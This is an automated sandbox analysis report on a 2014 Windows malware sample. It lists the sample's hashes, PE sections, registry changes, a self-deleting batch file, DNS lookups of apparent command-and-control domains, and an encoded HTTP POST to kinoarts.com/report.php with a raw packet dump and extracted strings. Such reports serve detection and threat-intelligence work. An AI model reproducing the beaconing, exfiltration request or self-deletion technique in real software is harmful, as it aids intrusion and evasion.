Analysis Date2014-09-23 23:41:11
MD558a47cb7ff17d415765b01a3f1823e00
SHA16ddd4db2fc6cc9a5a22fa0592d698690b8012e96

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.h0ha3 md5: 4de16cf5d1c7cbfe6e474573dcb8cea1 sha1: 4cff2ea7bcfc9b7c857ab8ddda2397ce0c5093cd size: 21504
Section.2fgb2 md5: 70555bc6f453eb056829048c849c4316 sha1: c9bc41e53903378d3764eda8f375aac1475488b6 size: 12800
Section.0hb84 md5: c329194b38785481c76aed671c41f9f0 sha1: 702135dffe756662634823124db4ae5804856cdc size: 56320
Section.ge458 md5: 87134f6e26826c1a739d2ef7d081e08f sha1: c792e44d9aad884ab7c925d3b4063c206718cdaa size: 3072
Section.rsrc md5: ad5f668bee3b700c3a3491f5567b6c23 sha1: fd76de2cf954426d494137046ae8d414e1d94417 size: 1536
Timestamp2007-03-01 13:12:28
PEhash54b595517bb8e81c57e77bd7d9b60a59e85e27de
IMPhash772d59e43070c991613db02005791ab7

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates ProcessC:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates Filenul
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Deletes FileC:\malware.exe

Network Details:

DNSkinoarts.com
Type: A
192.31.186.4
DNSpetroartsstudio.com
Type: A
DNSgreeartsday.com
Type: A
HTTP POSThttp://kinoarts.com/report.php?data=v26MmjSySdehDmJ07AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQ==
User-Agent: wget 3.0
Flows TCP192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7265 706f7274 2e706870   POST /report.php
0x00000010 (00016)   3f646174 613d7632 364d6d6a 53795364   ?data=v26MmjSySd
0x00000020 (00032)   6568446d 4a303741 55595272 4d375937   ehDmJ07AUYRrM7Y7
0x00000030 (00048)   2f754939 45384f64 59495358 30694c42   /uI9E8OdYISX0iLB
0x00000040 (00064)   734f5751 61483242 58617954 33774255   sOWQaH2BXayT3wBU
0x00000050 (00080)   33436346 58656763 79557638 34554b51   3CcFXegcyUv84UKQ
0x00000060 (00096)   3d3d2048 5454502f 312e310d 0a416363   == HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f0d 0a436f6e 74656e74   ept: */..Content
0x00000080 (00128)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000090 (00144)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x000000a0 (00160)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x000000b0 (00176)   67656e74 3a207767 65742033 2e300d0a   gent: wget 3.0..
0x000000c0 (00192)   486f7374 3a206b69 6e6f6172 74732e63   Host: kinoarts.c
0x000000d0 (00208)   6f6d0d0a 436f6e74 656e742d 4c656e67   om..Content-Leng
0x000000e0 (00224)   74683a20 3132310d 0a436f6e 6e656374   th: 121..Connect
0x000000f0 (00240)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x00000100 (00256)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000110 (00272)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000120 (00288)   3d756a6e 5433324f 2f463971 73447941   =ujnT32O/F9qsDyA
0x00000130 (00304)   7a36566c 4d533735 33502f58 34664d4d   z6VlMS753P/X4fMM
0x00000140 (00320)   78523930 4e43436f 33645531 43485744   xR90NCCo3dU1CHWD
0x00000150 (00336)   5a303065 43324879 32625379 47513058   Z00eC2Hy2bSyGQ0X
0x00000160 (00352)   5431702f 572f5a49 614a6b2b 4f644441   T1p/W/ZIaJk+OdDA
0x00000170 (00368)   7a42324b 364c746d 52314c61 432f716e   zB2K6LtmR1LaC/qn
0x00000180 (00384)   3949756b 362b3732 33775761 2f536b54   9Iuk6+723wWa/SkT
0x00000190 (00400)   7248413d 3d                           rHA==


Strings
(.}
..
D4F5CH
DDD4
EEE2
FE05HCF
	RC_RCDATA
RC_RCDATA2
<<<<<<<<,<<
^0F{V\}
.0hb84
0WQfua
/16yn=,VdE9
(1KJPg
`.2fgb2
3gbb268ghac4741fe2gc4g3dgd7
3K`A~w
3LX=2{.
3~RK6(Q
3up+q9"
3+YZI'
4b97dc47b63e48cf193a85f425ff2f7
4iTzpNwcy
/56H[T
5z+.;(NH
<<<<<-<<8<<)<<<<<)<<><<
8<<<y7t
a\bytj
advapi32.dll
aF[Hv#
AppendMenuW
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
#bgky+'
=c<<<<
CEz}-Mdv
CompareStringA
CopyFileA
CopyFileExA
D@0Hfo
d4Hf<<<4\
Da<<<<
DeleteFileA
DgA\d^su
D_P|zsr
}d(xJD
E]doXg
eegeh320e3hf951hg9a4eae42cf3d
e(hTyd
Ew%Td5
ExitProcess
EZIVH7
Ez*lZ'#
f66e8ffcbdf468d3cfd485e196a6b25g7c786
FindClose
FlushFileBuffers
FormatMessageA
FreeResource
FW-D`P
(g0Q( 
G0w!9j
@.ge458
GetCommandLineA
GetCPInfo
GetFileType
GetFocus
GetLastError
GFufrD
GlobalFree
g.xWZy
\H^<<<
.h0ha3
]h{1Lt
!H{<804
HeapFree
=HS<<<
>H}@zD
i8"ri`z]@uL
@Iz.Dn
j`H}Pgbjp
,JhzK1<
jXdtea
K8t@`4
K_B{}L0 
kernel32.dll
{+KI`d
}k:I#F
ky}l$.
L0&u"+
lc`|KN
lfD\.o
lstrcatA
lstrlenA
lXlT@<
l@z9Bw
M:'y l
:n0`vU
n1\+Iwsb
`nTkz2
ny$\{O(+`
O18{9z:
o{Dc8(
OpenFile
OpenFileMappingA
`(=p4y
pgy!y_8
P.rsrc
pz(ey{87
'q6V8p
QZ<?hN9
RegEnumKeyW
RegOpenKeyExA
RegQueryInfoKeyW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
rl Ho:Bt
s74^=9
      </security>
      <security>
sTBBSf
t,4vSL
T	8t	<
<<<<t=;B
TfX7E8W
tHd<<<t
!This program cannot be run in DOS mode.
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
user32.dll
VG9.'e
vHV[xr8
vJ#Smz	r
~v+sJ=
Vu]r\H;
vWYZE8
v`Zh_6
WL (e4:
$w>XdJ
^@+wy	
X0H`zhp
x9_|#`
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
X'|wmk~
)y1dqgq9
yfVgSx
)YHxq|
yY/uL(
zi_c%,
z$@j>T"